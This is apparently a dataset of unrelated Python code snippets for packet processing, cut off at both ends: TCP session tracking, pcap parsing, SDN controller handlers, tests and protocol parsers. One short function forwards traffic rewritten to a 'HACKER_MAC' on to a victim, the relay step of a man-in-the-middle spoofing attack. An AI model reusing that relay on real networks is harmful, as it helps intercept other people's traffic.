flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = [((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def receive_packet(self, packet):\n\t\treturn", "def test_process_packet(self):\n packet = {'a': 7}\n self.assertEqual(self.foo.a, 4)\n self.handler.process_packet(packet)\n self.assertEqual(self.foo.a, 7)\n packet = {'b': 9, 'a': 20}\n self.handler.process_packet(packet)\n self.assertEqual(self.foo.a, 20)\n self.assertEqual(self.foo.b, 42)", "def after_process(self, packet, ret_packet):\n pass", "def on_ofp_message(self, message: IncomingMessage) -> None:\n with message.process():\n log.debug(f\"received [x] {message.routing_key}:{message.body}\")\n (version, msg_type, msg_len, xid) = ofproto_parser.header(message.body)\n log.debug(\n f\"msg {version} {msg_type} {msg_len} {xid} {len(message.body)} {type(message.body)}\"\n )\n msg = ofproto_parser.msg(\n version, msg_type, msg_len, xid, message.body[:msg_len]\n )\n if msg_type == self.ofproto.OFPT_PACKET_IN:\n pkt_in = self.ofparser.OFPPacketIn.parser(msg_len, xid, msg.buf)\n pkt_in.serialize()\n dpid = int(message.routing_key.split(\".\")[-1])\n self.loop.create_task(self.handle_pktin(pkt_in, dpid))", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def OnESPacket(current_pid, packet, header_size):\n pass", "def dummy_transmit_handler(out_port, packet):\n pass", "def handle_packet(self, packet, udp_dport):\n return self.process_packet(packet, udp_dport)", "def sniffer_callback(self, pkt):\n #if \"Ether\" in pkt and \"IP\" in pkt and \"TCP\" in pkt:\n if \"TCP\" in pkt:\n\n # Debug check for packet details\n # print(pkt.summary())\n\n if pkt[TCP].payload:\n # print(\"[PAYLOAD]:\\n%s\" % pkt[TCP].payload)\n self.callback_object.process_packet(pkt)\n\n # Ignore packets without payload\n # else:\n # print(\"[NO-LOAD]Packet does not have payload!\")", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def test_process_packet_message(self):\n\n pkt = {'type': 'message',\n 'endpoint': '',\n 'data': 'woot'}\n data = self.ns.process_packet(pkt)\n self.assertEqual(data, pkt['data'])\n assert not self.environ['socketio'].error.called\n\n # processing a message packet with id and endpoint\n pkt = {'type': 'message',\n 'id': 5,\n 'ack': True,\n 'endpoint': '/tobi',\n 'data': ''}\n data = self.ns.process_packet(pkt)\n self.assertEqual(data, pkt['data'])\n assert not self.environ['socketio'].error.called", "def parse(data: bytes, port: int, origin: helpers.ConnectionType):\n # Ignore packets from master server... game server is more interesting\n if port == helpers.MASTER_PORT:\n return\n # Iteratively parse packet data until nothing is left to parse\n reads = 0\n while len(data) >= 2:\n reads += 1\n pid = data[:2]\n handler = PACKET_HANDLERS.get(pid, None)\n if handler:\n # Parse data without packet id prepended\n # Returned data will be parsed next iteration\n data = handler(data[2:], origin=origin)\n else:\n # This packet doesn't have a handler\n # Print it once for inspection\n if reads <= 1:\n print(f'[{pid}] - {data}\\n')\n # Remove the first byte and try parsing again later\n data = data[1:]", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n raise NotImplemented", "def packet_processing(pkt):\n with open(\"/proc/net/netfilter/nfnetlink_queue\", \"r\") as proc_file:\n proc_line = [x for x in proc_file.readline().split(\" \") if x]\n print(f\"Packets in queue: {proc_line[2]}\")\n #print(f\"Packets processed: {proc_line[7]}\")\n #TEMP\n packet = IP(pkt.get_payload())\n pkt.drop()\n return\n\n with open(LOGFILE, \"a\") as logfile:\n pkt.drop()\n start = datetime.now()\n packet = IP(pkt.get_payload())\n packet_bits = to_bit_array(packet)\n\n source_address = packet[IP].src\n print(f\"Packet received from {source_address}\")\n\n new_packet_bits, cost = quantum_protocol.transmit_packet(packet_bits, source_address)\n\n new_packet = IP(from_bit_array(new_packet_bits))\n send(new_packet)\n end = datetime.now()\n log_info(\"badnwidt.log\", start, end, new_packet_bits, cost)\n logfile.write(\"PACKET TRANSMITTED_________________\\n\")\n logfile.write(hexdump(packet, dump=True) + \"\\n\")\n logfile.write(hexdump(new_packet, dump=True) + \"\\n\")\n logfile.write(\"Transmission time:\" + str(end-start) + \"\\n\")\n #packet.show()\n #new_packet.show()", "def foward_packet_to_si(self, info, packet, address, connection, channel, db):\n try:\n head = info.head\n args = DotDict(success=GATEWAY.RESPONSE_STATUS.SUCCESS,\n command=head.command)\n dev_id = head.dev_id\n resend_key, resend_flag = get_resend_flag(self.redis, dev_id, head.timestamp, head.command)\n sessionID = QueryHelper.get_terminal_sessionID(dev_id, self.redis)\n if sessionID != head.sessionID:\n args.success = GATEWAY.RESPONSE_STATUS.INVALID_SESSIONID\n logging.error(\"[GW] Invalid sessionID, Terminal: %s\", dev_id)\n else:\n seq = str(int(time.time() * 1000))[-4:]\n uargs = DotDict(seq=seq,\n dev_id=dev_id,\n content=packet)\n content = UploadDataComposer(uargs).buf\n logging.info(\"[GW] Forward message to SI:\\n%s\", content)\n if resend_flag:\n logging.warn(\"[GW] Recv resend packet: %s, and drop it!\", packet)\n else:\n append_si_request(content, connection, channel, self.exchange, self.si_binding)\n update_terminal_status(self.redis, dev_id, address)\n\n #NOTE: Handle the packet.\n if head.command in (GATEWAY.T_MESSAGE_TYPE.POSITION, GATEWAY.T_MESSAGE_TYPE.MULTIPVT,\n GATEWAY.T_MESSAGE_TYPE.CHARGE, GATEWAY.T_MESSAGE_TYPE.ILLEGALMOVE,\n GATEWAY.T_MESSAGE_TYPE.POWERLOW, GATEWAY.T_MESSAGE_TYPE.ILLEGALSHAKE,\n GATEWAY.T_MESSAGE_TYPE.EMERGENCY, GATEWAY.T_MESSAGE_TYPE.POWERDOWN, \n GATEWAY.T_MESSAGE_TYPE.STOP):\n logging.info(\"[GW] Head command: %s.\", head.command)\n if args['success'] == GATEWAY.RESPONSE_STATUS.SUCCESS: \n acc_status_info_key = get_acc_status_info_key(dev_id) \n acc_status_info = self.redis.getvalue(acc_status_info_key) \n if acc_status_info and (not acc_status_info['t2_status']): # T2(query) is need \n logging.info(\"[GW] ACC_status is changed, dev_id: %s, acc_status_info: %s\", \n dev_id, acc_status_info)\n args['success'] = 3 # acc_status is changed\n\n #NOTE: composer response for terminal \n rc = AsyncRespComposer(args)\n request = DotDict(packet=rc.buf,\n address=address,\n dev_id=dev_id)\n \n append_gw_request(request, connection, channel, self.exchange, self.gw_binding)\n # resend flag\n if not resend_flag:\n self.redis.setvalue(resend_key, True, GATEWAY.RESEND_EXPIRY)\n elif head.command == GATEWAY.T_MESSAGE_TYPE.UNBIND: # S24-->T24\n logging.info(\"[GW] Head command: %s.\", head.command)\n up = UNBindParser(info.body, info.head)\n status = up.ret['status']\n if status == GATEWAY.STATUS.SUCCESS:\n delete_terminal_new(dev_id, db, self.redis)\n else:\n logging.exception(\"[GW] Invalid command: %s.\", head.command)\n except:\n logging.exception(\"[GW] Handle SI message exception.\")\n GWException().notify()", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n \n self.do_firewall(packet, packet_in, event)", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def process(self, data):\n\n\t\t# Check if the 802.15.4 packet is valid\n\t\tif makeFCS(data[:-2]) != data[-2:]:\n\t\t\tprint(hue.bad(\"Received invalid packet\"))\n\t\t\treturn\n\n\t\tpacket = Dot15d4FCS(data)\n\n\t\tif packet.fcf_frametype == 2: # ACK\n\t\t\tself.last_ack = packet.seqnum", "def send_packet(self, buffer_id, raw_data, out_port, in_port):\n # We tell the switch to take the packet with id buffer_if from in_port \n # and send it to out_port\n # If the switch did not specify a buffer_id, it must have specified\n # the raw data of the packet, so in this case we tell it to send\n # the raw data\n msg = of.ofp_packet_out()\n msg.in_port = in_port\n if buffer_id != -1 and buffer_id is not None:\n # We got a buffer ID from the switch; use that\n msg.buffer_id = buffer_id\n else:\n # No buffer ID from switch -- we got the raw data\n if raw_data is None:\n # No raw_data specified -- nothing to send!\n return\n msg.data = raw_data\n \n # Add an action to send to the specified port\n if out_port == of.OFPP_FLOOD:\n # send to all active ports according to STP\n for outPort in self.ports_use:\n if outPort != in_port:\n action = of.ofp_action_output(port=outPort)\n msg.actions.append(action)\n else:\n action = of.ofp_action_output(port=out_port)\n msg.actions.append(action)\n # Send message to switch\n self.connection.send(msg)", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def setPacket(self, packet):\n\t\tself.clear()\n\t\tself.packet = packet\n\t\t\n\t\tfields = self.fields\n\t\t\n\t\tfields.append(['Reception time', '%s:%s:%s.%s' % tuple(packet.time), None])\n\t\t\n\t\tif self.packet.isInvalid:\n\t\t\treturn\n\t\t\n\t\tfields.append(['Transmission info', 'CRC passed: %s, LQI: %s, RSSI: %s' % (packet.CRCOk, packet.LQI, packet.RSSI), None])\n\t\tfields.append(['PHY fields', '', None])\n\t\tphy = len(fields) - 1\n\t\tfields.append(['Frame length', len(packet.load), phy])\n\t\t\n\t\tfields.append(['MAC fields', '', None])\n\t\tmac = len(fields) - 1\n\t\tfields.append(['Frame control', packet.frameControl, 